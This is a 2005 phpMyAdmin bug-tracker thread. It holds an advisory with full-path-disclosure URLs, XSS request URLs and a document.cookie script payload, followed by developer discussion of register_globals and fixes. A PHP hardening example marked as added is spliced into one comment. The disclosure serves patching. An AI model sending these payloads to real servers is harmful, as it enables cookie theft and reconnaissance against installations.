
#1610 (in 2.6.1-pl1) Possible XSS Attacks

2.6.1
invalid
1
2015-01-27
2005-02-22
No

[phpMyAdmin 2.6.1 Full Path Disclosure and XSS cXIb8O3.5]

Author: cXIb8O3
Date: 22.2.2005

--- 0. Description ---
phpMyAdmin 2.6.1 is a tool written in PHP intended to
handle the administration of MySQL over the Web.
Currently it can create and drop databases,
create/drop/alter tables, delete/edit/add fields,
execute any SQL statement, manage keys on fields.

--- 1. Full Path Disclosure ---
1.0
http://[HOST]/[DIR]/libraries/sqlvalidator.lib.php?cfg[SQLValidator][use]=cXIb8O3
Error message:
---------------
Warning: main(./libraries/sqlvalidator.class.php)
[function.main]: failed to open stream: No such file or
directory in
/www/phpMyAdmin-2.6.1/libraries/sqlvalidator.lib.php on
line 39

Fatal error: main() [function.require]: Failed opening
required './libraries/sqlvalidator.class.php'
(include_path='.:') in
/www/phpMyAdmin-2.6.1/libraries/sqlvalidator.lib.php on
line 39

1.1
http://[HOST]/[DIR]/libraries/sqlparser.lib.php

Error message:
---------------
Warning: main(./libraries/string.lib.php)
[function.main]: failed to open stream: No such file or
directory in
/www/phpMyAdmin-2.6.1/libraries/sqlparser.lib.php on
line 46

Fatal error: main() [function.require]: Failed opening
required './libraries/string.lib.php'
(include_path='.:') in
/www/phpMyAdmin-2.6.1/libraries/sqlparser.lib.php on
line 46
---------------

1.2
http://[HOST]/[DIR]/libraries/select_theme.lib.php

Error message:
---------------
Warning: main(./libraries/grab_globals.lib.php)
[function.main]: failed to open stream: No such file or
directory in
/www/phpMyAdmin-2.6.1/libraries/select_theme.lib.php on
line 34

Fatal error: main() [function.require]: Failed opening
required './libraries/grab_globals.lib.php'
(include_path='.:') in
/www/phpMyAdmin-2.6.1/libraries/select_theme.lib.php on
line 34
---------------

1.3
http://[HOST]/[DIR]/libraries/select_lang.lib.php

Error message:
---------------
Warning: main(./libraries/grab_globals.lib.php)
[function.main]: failed to open stream: No such file or
directory in
/www/phpMyAdmin-2.6.1/libraries/select_lang.lib.php on
line 14

Fatal error: main() [function.require]: Failed opening
required './libraries/grab_globals.lib.php'
(include_path='.:') in
/www/phpMyAdmin-2.6.1/libraries/select_lang.lib.php on
line 14
---------------

1.4
http://[HOST]/[DIR]/libraries/relation_cleanup.lib.php

Error message:
---------------
Warning: main(./libraries/relation.lib.php)
[function.main]: failed to open stream: No such file or
directory in
/www/phpMyAdmin-2.6.1/libraries/relation_cleanup.lib.php
on line 10

Fatal error: main() [function.require]: Failed opening
required './libraries/relation.lib.php'
(include_path='.:') in
/www/phpMyAdmin-2.6.1/libraries/relation_cleanup.lib.php
on line 10
---------------

1.5
http://[HOST]/[DIR]/libraries/header_meta_style.inc.php

Error message:
---------------
Fatal error: Call to undefined function
PMA_setFontSizes() in
/www/phpMyAdmin-2.6.1/libraries/header_meta_style.inc.php
on line 9
---------------

1.6
http://[HOST]/[DIR]/libraries/get_foreign.lib.php?foreigners=cXIb8O3&field=hi&foreigners[hi]=unloved

Error message:
---------------
Fatal error: Call to undefined function
PMA_countRecords() in
/www/phpMyAdmin-2.6.1/libraries/get_foreign.lib.php on
line 28
---------------

1.7
http://[HOST]/[DIR]/libraries/display_tbl_links.lib.php?doWriteModifyAt=left&del_url=Smutno&is_display[del_lnk]=Mi

Error message:
---------------
Fatal error: Call to undefined function
PMA_linkOrButton() in
/www/phpMyAdmin-2.6.1/libraries/display_tbl_links.lib.php
on line 28
---------------

1.8
http://[HOST]/[DIR]/libraries/display_export.lib.php

Error message:
---------------
Warning: main(./libraries/relation.lib.php)
[function.main]: failed to open stream: No such file or
directory in
/www/phpMyAdmin-2.6.1/libraries/display_export.lib.php
on line 6

Fatal error: main() [function.require]: Failed opening
required './libraries/relation.lib.php'
(include_path='.:') in
/www/phpMyAdmin-2.6.1/libraries/display_export.lib.php
on line 6
---------------

1.9
http://[HOST]/[DIR]/libraries/db_table_exists.lib.php

Error message:
---------------
Fatal error: Call to undefined function
PMA_sendHeaderLocation() in
/www/phpMyAdmin-2.6.1/libraries/db_table_exists.lib.php
on line 16
---------------

1.10
http://[HOST]/[DIR]/libraries/charset_conversion.lib.php?cfg[AllowAnywhereRecoding]=smutno&allow_recoding=mi

Error message:
---------------
Fatal error: Call to undefined function PMA_dl() in
/www/phpMyAdmin-2.6.1/libraries/charset_conversion.lib.php
on line 42
---------------

1.11
http://[HOST]/[DIR]/libraries/fpdf/ufpdf.php

Error message:
---------------
Warning: main(./libraries/fpdf/fpdf.php)
[function.main]: failed to open stream: No such file or
directory in
/www/phpMyAdmin-2.6.1/libraries/fpdf/ufpdf.php on line 18

Warning: main() [function.include]: Failed opening
'./libraries/fpdf/fpdf.php' for inclusion
(include_path='.:') in
/www/phpMyAdmin-2.6.1/libraries/fpdf/ufpdf.php on line 18

Fatal error: Class 'FPDF' not found in
/www/phpMyAdmin-2.6.1/libraries/fpdf/ufpdf.php on line 20
---------------

1.12
http://[HOST]/[DIR]/libraries/dbi/mysqli.dbi.lib.php

Error message:
---------------
Fatal error: Call to undefined function PMA_dl() in
/www/phpMyAdmin-2.6.1/libraries/dbi/mysqli.dbi.lib.php
on line 13
---------------

1.13
http://[HOST]/[DIR]/libraries/dbg/setup.php?GLOBALS[cfg][DBG][enable]=cXIb

Error message:
---------------
Fatal error: Call to undefined function PMA_dl() in
/www/phpMyAdmin-2.6.1/libraries/dbg/setup.php on line 10
---------------

1.14
http://[HOST]/[DIR]/libraries/auth/cookie.auth.lib.php?coming_from_common=cXIb8O3

Error message:
---------------
Fatal error: Call to undefined function
PMA_setFontSizes() in
/www/phpMyAdmin-2.6.1/libraries/auth/cookie.auth.lib.php
on line 17
---------------

--- 2. XSS aka Cross Site Scripting ---

2.0
http://[HOST]/[DIR]/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&show_server_left=MyToMy&strServer=[XSS%20code]

http://[HOST]/[DIR]/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&cfg[BgcolorOne]=777777%22%3E%3CH1%3E[XSS%20code]

http://[HOST]/[DIR]/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&strServerChoice=%3CH1%3EXSS

2.1
http://[HOST]/[DIR]/libraries/display_tbl_links.lib.php?doWriteModifyAt=left&del_url=Smutno&is_display[del_lnk]=Mi&bgcolor=%22%3E[XSS%20code]

http://[HOST]/[DIR]/libraries/display_tbl_links.lib.php?doWriteModifyAt=left&del_url=Smutno&is_display[del_lnk]=Mi&row_no=%22%3E[XSS%20code]

2.2
http://[HOST]/[DIR]/themes/original/css/theme_left.css.php?num_dbs=0&left_font_family=[XSS]
and more in this file.

2.3
http://[HOST]/[DIR]/themes/original/css/theme_right.css.php?right_font_family=[XSS]
and more in this file.

--- 3. How to fix ---

Download the new version of the script or update.

--- 4. Greets ---

sp3x and ladyBMS

--- 5. Contact ---
Author: Maksymilian Arciemowicz
Location: Poland(Jelenia Gora), Luxembourg(Bereldange)
Email: max [at] jestsuper [dot] pl
GPG-KEY: http://security.jestsuper.pl
http://securityreason.com/ Team

I am waiting for patches...

Discussion

  • Alexander M. Turek

    Maksymilian,

    Thank you for your report.

    First of all, please do not submit two different issues with
    one bug report.

    The first issue (path disclosure) was already reported to us
    and we are currently dealing with it. Please note that you
    can only exploit it if the php setting "display_errors" is
    set to 1. The php manual advises to disable this feature on
    production systems.

    http://de2.php.net/manual/en/ref.errorfunc.php#ini.display-errors

    Thank you,

    Alexander M. Turek

     
  • Alexander M. Turek

    • summary: [phpMyAdmin 2.6.1 Full Path Disclosure and XSS cXIb8O3.5] --> (2.6.1) Full Path Disclosure and XSS
     
  • Maksymilian Arciemowicz

    OK.. so path disclosure is non-critical etc..
    but XSS..

     
  • Alexander M. Turek

    • priority: 5 --> 9
    • assigned_to: nobody --> rabus
    • labels: --> Security / Restrictions
    • milestone: --> 2.6.1
    • status: open --> open-accepted
     
  • Alexander M. Turek

    OK, let's do this. :-)

    2.0: With grab_globals.lib.php, rev. 2.8 (attached to bug
    #1149381), I cannot reproduce these exploits anymore.

    2.1, 2.2 and 2.3: These exploits require "register_globals"
    to be enabled in php.ini. This setting is considered to be
    very dangerous and therefore disabled by default since php 4.2.0.

    http://de3.php.net/register_globals

    Maksymilian, is there any XSS attack you can see with my
    latest patch and register_globals = Off? If not, I'd like to
    mark this bug as fixed, too.

     
  • Michal Čihař

    Michal Čihař - 2005-02-23

    Ad 2.1: I suggest making the content of that file a function and
    calling it with all needed params instead of including it.

    Ad 2.2 and 2.3: I can't find anything dangerous in modifying
    CSS.

     
  • Alexander M. Turek


    Michal, when the script is called directly, the headers that
    declare the code to be CSS are not sent. The browser would
    expect HTML code, so you could inject harmful JS code here.

    Were you able to reproduce the exploits?

     
  • Michal Čihař

    Michal Čihař - 2005-02-23

    Maksymilian: When you sign messages using PGP, you should
    publish your public key on a keyserver, otherwise it doesn't make
    much sense.

    rabus: I can reproduce it only with register_globals on. But
    it's really hard to make valid JavaScript there when
    magic_quotes_gpc is enabled (which is the default).

     
  • Marc Delisle

    Marc Delisle - 2005-02-23


    Alexander,
    for 2.0, I am able to reproduce, with PMA 2.6.1, using
    /libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&show_server_left=MyToMy&strServer=%3Cscript%3Ealert(document.cookie)%3C/script%3E

    It happens also with current cvs HEAD (grab_globals.lib.php 2.8)

     
  • Michal Čihař

    Michal Čihař - 2005-02-23


    Marc: you have register_globals on ;-)

     
  • Alexander M. Turek

    Michal is right. With register_globals set to off, this
    should not be possible anymore:

    http://rabus.phpmyadmin.net/demos/CVS_LATEST/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&show_server_left=MyToMy&strServer=%3Cscript%3Ealert(document.cookie)%3C/script%3E

    If register_globals is on, it is almost impossible to avoid
    such problems.

     
  • Marc Delisle

    Marc Delisle - 2005-02-23

    Yes, I have register_globals set to On; you see, many
    scripts are running here which depend on this setting.... And
    I'm probably not the only one.

    We have PMA_sanitize() which can take care of this. However,
    I should put it into another include and call it from the
    top of each script: much work in perspective.

     
  • Alexander M. Turek


    Marc,

    this is mainly why it is possible to trigger this setting on
    a per-directory basis. Enabling register_globals in php.ini
    is dangerous and getting phpMyAdmin to detect harmful
    variable injections is not that trivial right now.

     
  • Maksymilian Arciemowicz

    OK so..
    if register_globals=Off the CSS ones don't exist, but if
    register_globals=On I can make an XSS attack.
    For example:
    if I have www on server X where register_globals=On and
    phpMyAdmin in my www, I can do nothing about it. Better remove
    this XSS from phpMyAdmin. ;]

     
  • Alexander M. Turek

    • priority: 9 --> 1
    • summary: (2.6.1) Full Path Disclosure and XSS --> (in 2.6.1-pl1) Possible XSS Attacks
    • status: open-accepted --> open-fixed
     
  • Alexander M. Turek


    Sure you can, at least if you are using the Apache Webserver:

    echo "php_flag register_globals off" >>
    /path/to/phpMyAdmin/.htaccess

    If not, there is probably a way to change php settings on a
    per-directory basis in other webservers too.

    Working around register_globals injections is almost
    impossible for a project of our size. We will try to fix
    this as far as possible with upcoming releases, but we can
    never guarantee that you are fully protected against such
    exploits. Securing php against them is mainly your task, not
    ours. Sorry. :-/
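Putting together the defences raised in this thread (the direct-call problem behind sections 1 and 2 of the advisory, the missing CSS content type Alexander notes above, and the register_globals injection he describes as hard to work around), as an added PHP example that is not phpMyAdmin's own code; the PMA_ENTRY constant, the 'LeftFontFamily' config key and the allowed-variable list are assumptions:

```php
<?php
// Added example, not phpMyAdmin's own code: a hardened skeleton for a
// script like themes/original/css/theme_left.css.php. The constant
// PMA_ENTRY, the config key 'LeftFontFamily' and the allowed-variable
// list are assumptions made for this illustration.

// 1. Refuse direct calls. The entry script defines PMA_ENTRY before
//    including this file; a direct GET of the library file (as in the
//    advisory's URLs) therefore produces neither errors nor markup.
if (!defined('PMA_ENTRY')) {
    header('HTTP/1.0 403 Forbidden');
    exit;
}

// 2. Undo register_globals: drop every global that mirrors a request
//    key unless it is explicitly expected. This must run before the
//    trusted config file is loaded, so an injected cfg[...] array
//    cannot survive as extra keys next to the configured ones.
function pma_strip_injected_globals(array $allowed)
{
    $request = array_merge($_GET, $_POST, $_COOKIE);
    foreach (array_keys($request) as $key) {
        if (!in_array($key, $allowed, true)) {
            unset($GLOBALS[$key]);
        }
    }
}

// 3. Only emit a font-family value that is a plain list of names;
//    quotes, angle brackets or braces fall back to a safe default,
//    so the stylesheet cannot be broken out of.
function pma_safe_font_family($value, $default = 'sans-serif')
{
    if (is_string($value) && preg_match('/^[A-Za-z0-9 ,_-]{1,100}$/', $value)) {
        return $value;
    }
    return $default;
}

pma_strip_injected_globals(array('lang', 'server'));
require './config.inc.php';            // trusted source of $cfg

// 4. Declare the response as CSS, so a browser never parses it as HTML.
header('Content-Type: text/css; charset=utf-8');

$font = pma_safe_font_family(isset($cfg['LeftFontFamily']) ? $cfg['LeftFontFamily'] : null);
echo "body { font-family: $font; }\n";
```

With register_globals still on, step 2 is what keeps a query-string cfg[...] or left_font_family from reaching the script; with it off, steps 1 and 4 alone already close the direct-call cases listed in the advisory.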

     
  • Maksymilian Arciemowicz


    Ok... [:

     
  • Maksymilian Arciemowicz


    Ok... [:

     
  • Alexander M. Turek

    • status: open-fixed --> closed-fixed
     
  • Michal Čihař

    Michal Čihař - 2013-06-11
    • Status: closed-fixed --> invalid